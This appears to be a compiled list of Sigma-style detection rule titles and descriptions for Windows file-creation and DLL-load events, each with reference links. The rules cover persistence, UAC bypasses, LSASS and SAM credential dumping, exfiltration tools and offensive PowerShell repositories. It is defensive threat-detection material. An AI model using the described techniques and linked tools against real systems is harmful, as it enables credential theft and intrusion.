Uncommon File Created In Office Startup Folder Detects the creation of a file with an uncommon extension in an Office application startup folder https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/, http://addbalance.com/word/startup.htm, https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3, https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions
Potential Persistence Via Outlook Form Detects the creation of a new Outlook form which can contain malicious code https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79, https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form, https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/
Suspicious File Created In PerfLogs Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files Internal Research, https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential Binary Or Script Dropper Via PowerShell Detects PowerShell creating a binary executable or a script file. https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
PowerShell Script Dropped Via PowerShell.EXE Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence. https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
Malicious PowerShell Scripts - FileCreation Detects the creation of known offensive powershell scripts used for exploitation https://github.com/PowerShellMafia/PowerSploit, https://github.com/NetSPI/PowerUpSQL, https://github.com/CsEnox/EventViewer-UACBypass, https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu, https://github.com/nettitude/Invoke-PowerThIEf, https://github.com/S3cur3Th1sSh1t/WinPwn, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon
PowerShell Module File Created Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
PowerShell Module File Created By Non-PowerShell Process Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
Potential Suspicious PowerShell Module File Created Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder. Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
Potential Startup Shortcut Persistence Via PowerShell.EXE Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" https://redcanary.com/blog/intelligence-insights-october-2021/, https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder
PSScriptPolicyTest Creation By Uncommon Process Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker. https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/
Rclone Config File Creation Detects Rclone config files being created https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
.RDP File Created By Uncommon Application Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files. https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
Potential Winnti Dropper Activity Detects files dropped by Winnti as described in RedMimicry Winnti playbook https://redmimicry.com/posts/redmimicry-winnti/#dropper
PDF File Created By RegEdit.EXE Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses. https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/
RemCom Service File Creation Detects default RemCom service filename which indicates RemCom service installation and execution https://github.com/kavika13/RemCom/
ScreenConnect Temporary Installation Artefact An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows
Remote Access Tool - ScreenConnect Temporary File Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. https://github.com/SigmaHQ/sigma/pull/4467
Potential RipZip Attack on Startup Folder Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19
Potential SAM Database Dump Detects the creation of files that look like exports of the local SAM (Security Account Manager) https://github.com/search?q=CVE-2021-36934, https://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934, https://www.google.com/search?q=%22reg.exe+save%22+sam, https://github.com/HuskyHacks/ShadowSteal, https://github.com/FireFart/hivenightmare
Self Extraction Directive File Created In Potentially Suspicious Location Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
Windows Shell/Scripting Application File Write to Suspicious Folder Detects Windows shells and scripting applications that write files to suspicious folders Internal Research
Windows Binaries Write Suspicious Extensions Detects Windows executables that write files with suspicious extensions Internal Research
Startup Folder File Write A General detection for files being created in the Windows startup directory. This could be an indicator of persistence. https://github.com/OTRF/detection-hackathon-apt29/issues/12, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md
Suspicious Creation with Colorcpl Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\ https://twitter.com/eral4m/status/1480468728324231172?s=20
Created Files by Microsoft Sync Center This rule detects suspicious files created by Microsoft Sync Center (mobsync) https://redcanary.com/blog/intelligence-insights-november-2021/
Suspicious Files in Default GPO Folder Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder https://redcanary.com/blog/intelligence-insights-november-2021/
Suspicious Desktopimgdownldr Target File Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/, https://twitter.com/SBousseaden/status/1278977301745741825
Suspicious desktop.ini Action Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
Suspicious Creation TXT File in User Desktop Ransomware create txt file in the user Desktop https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note
Creation of a Diagcab Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location) https://threadreaderapp.com/thread/1533879688141086720.html
DPAPI Backup Keys And Certificate Export Activity IOC Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates. https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/, https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32
Suspicious Double Extension Files Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default. https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations, https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles, https://twitter.com/malwrhunterteam/status/1235135745611960321, https://twitter.com/luc4m/status/1073181154126254080
Suspicious MSExchangeMailboxReplication ASPX Write Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation https://redcanary.com/blog/blackbyte-ransomware/
Suspicious Executable File Creation Detect creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae, https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/
Suspicious Get-Variable.exe Creation Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/, https://www.joesandbox.com/analysis/465533/0/html
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe" https://twitter.com/pfiatde/status/1681977680688738305, https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/, https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/, https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3
Potential Homoglyph Attack Using Lookalike Characters in Filename Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish, http://www.irongeek.com/homoglyph-attack-generator.php
Legitimate Application Dropped Archive Detects programs on a Windows system that should not write an archive to disk https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
Legitimate Application Dropped Executable Detects programs on a Windows system that should not write executables to disk https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
Legitimate Application Dropped Script Detects programs on a Windows system that should not write scripts to disk https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
Suspicious LNK Double Extension File Created Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default. https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations, https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles, https://twitter.com/malwrhunterteam/status/1235135745611960321, https://twitter.com/luc4m/status/1073181154126254080
Suspicious PFX File Creation A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file. https://github.com/OTRF/detection-hackathon-apt29/issues/14, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md
PowerShell Profile Modification Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/, https://persistence-info.github.io/Data/powershellprofile.html
Suspicious PROCEXP152.sys File Created In TMP Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
Suspicious File Creation Activity From Fake Recycle.Bin Folder Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware https://www.mandiant.com/resources/blog/infected-usb-steal-secrets, https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
Potential File Extension Spoofing Using Right-to-Left Override Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions. https://redcanary.com/blog/right-to-left-override/, https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method
Drop Binaries Into Spool Drivers Color Folder Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/
Suspicious Startup Folder Persistence Detects when a file with a suspicious extension is created in the startup folder https://github.com/last-byte/PersistenceSniper
Suspicious Scheduled Task Write to System32 Tasks Detects the creation of tasks from processes executed from suspicious locations Internal Research
Suspicious Interactive PowerShell as SYSTEM Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm
TeamViewer Remote Session Detects the creation of log files during a TeamViewer remote session https://www.teamviewer.com/en-us/
VsCode Powershell Profile Modification Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2
Windows Terminal Profile Settings Modification By Uncommon Process Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile, https://twitter.com/nas_bench/status/1550836225652686848
WinSxS Executable File Creation By Non-System Process Detects the creation of binaries in the WinSxS folder by non-system processes https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
LiveKD Kernel Memory Dump File Created Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. Internal Research
LiveKD Driver Creation Detects the creation of the LiveKD driver, which is used for live kernel debugging Internal Research
LiveKD Driver Creation By Uncommon Process Detects the creation of the LiveKD driver by a process image other than "livekd.exe". Internal Research
Process Explorer Driver Creation By Non-Sysinternals Binary Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer, https://github.com/Yaxser/Backstab, https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks, https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
Process Monitor Driver Creation By Non-Sysinternals Binary Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. Internal Research
PsExec Service File Creation Detects default PsExec service filename which indicates PsExec service installation and execution https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
PSEXEC Remote Execution File Artefact Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system https://aboutdfir.com/the-key-to-identify-psexec/, https://twitter.com/davisrichardg/status/1616518800584704028
Potential Privilege Escalation Attempt Via .Exe.Local Technique Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" https://github.com/binderlabs/DirCreate2System, https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt
LSASS Process Memory Dump Creation Via Taskmgr.EXE Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1
Hijack Legit RDP Session to Move Laterally Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder Internal Research
UAC Bypass Using Consent and Comctl32 - File Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) https://github.com/hfiref0x/UACME
UAC Bypass Using .NET Code Profiler on MMC Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) https://github.com/hfiref0x/UACME
UAC Bypass Using EventVwr Detects the pattern of a UAC bypass using Windows Event Viewer https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw, https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g, https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute
UAC Bypass Using IDiagnostic Profile - File Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique https://github.com/Wh04m1001/IDiagnosticProfileUAC
UAC Bypass Using IEInstal - File Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) https://github.com/hfiref0x/UACME
UAC Bypass Using MSConfig Token Modification - File Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) https://github.com/hfiref0x/UACME
UAC Bypass Using NTFS Reparse Point - File Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) https://github.com/hfiref0x/UACME
UAC Bypass Abusing Winsat Path Parsing - File Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) https://github.com/hfiref0x/UACME
UAC Bypass Using Windows Media Player - File Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) https://github.com/hfiref0x/UACME
Creation of WerFault.exe/Wer.dll in Unusual Folder Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking. https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/
VHD Image Download Via Browser Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. https://redcanary.com/blog/intelligence-insights-october-2021/, https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/, https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Visual Studio Code Tunnel Remote File Creation Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature Internal Research
Renamed VsCode Code Tunnel Execution - File Indicator Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode. https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html
Potential Webshell Creation On Static Website Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. PT ESC rule and personal experience, https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
Wmiexec Default Output File Detects the creation of the default output filename used by the wmiexec tool https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/, https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py
Wmiprvse Wbemcomn DLL Hijack - File Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html
WMI Persistence - Script Event Consumer File Write Detects file writes of WMI script event consumer https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
UEFI Persistence Via Wpbbin - FileCreation Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c, https://persistence-info.github.io/Data/wpbbin.html
Writing Local Admin Share Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share
Potentially Suspicious Self Extraction Directive File Created Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries. https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
DLL Loaded From Suspicious Location Via Cmspt.EXE Detects cmstp loading "dll" or "ocx" files from suspicious locations https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml
Suspicious Appended Extension Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc. https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/, https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/
Amsi.DLL Loaded Via LOLBIN Process Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack Internal Research, https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/
Potential Azure Browser SSO Abuse Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user. https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30
Suspicious Renamed Comsvcs DLL Loaded By Rundll32 Detects rundll32 loading a renamed comsvcs.dll to dump process memory https://twitter.com/sbousseaden/status/1555200155351228419
CredUI.DLL Loaded By Uncommon Process Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password, https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa, https://github.com/S12cybersecurity/RDPCredentialStealer
Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump, https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html, https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
PCRE.NET Package Image Load Detects processes loading modules related to PCRE.NET package https://twitter.com/rbmaslen/status/1321859647091970051, https://twitter.com/tifkin_/status/1321916444557365248
Load Of RstrtMgr.DLL By A Suspicious Process Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes. https://www.crowdstrike.com/blog/windows-restart-manager-part-1/, https://www.crowdstrike.com/blog/windows-restart-manager-part-2/, https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/, https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html
Load Of RstrtMgr.DLL By An Uncommon Process Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes. https://www.crowdstrike.com/blog/windows-restart-manager-part-1/, https://www.crowdstrike.com/blog/windows-restart-manager-part-2/, https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/, https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html
Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/
Time Travel Debugging Utility Usage - Image Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. https://lolbas-project.github.io/lolbas/Binaries/Tttracer/, https://twitter.com/mattifestation/status/1196390321783025666, https://twitter.com/oulusoyum/status/1191329746069655553
PowerShell Core DLL Loaded By Non PowerShell Process Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension. https://adsecurity.org/?p=2921, https://github.com/p3nt4/PowerShdll
Suspicious Volume Shadow Copy Vssapi.dll Load Detects the image load of VSS DLL by uncommon executables https://github.com/ORCx41/DeleteShadowCopies
Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load Detects the image load of VSS DLL by uncommon executables https://github.com/ORCx41/DeleteShadowCopies
Suspicious Volume Shadow Copy VSS_PS.dll Load Detects the image load of vss_ps.dll by uncommon executables https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add, https://twitter.com/am0nsec/status/1412232114980982787
HackTool - SILENTTRINITY Stager DLL Load Detects SILENTTRINITY stager dll loading activity https://github.com/byt3bl33d3r/SILENTTRINITY
HackTool - SharpEvtMute DLL Load Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs https://github.com/bats3c/EvtMute
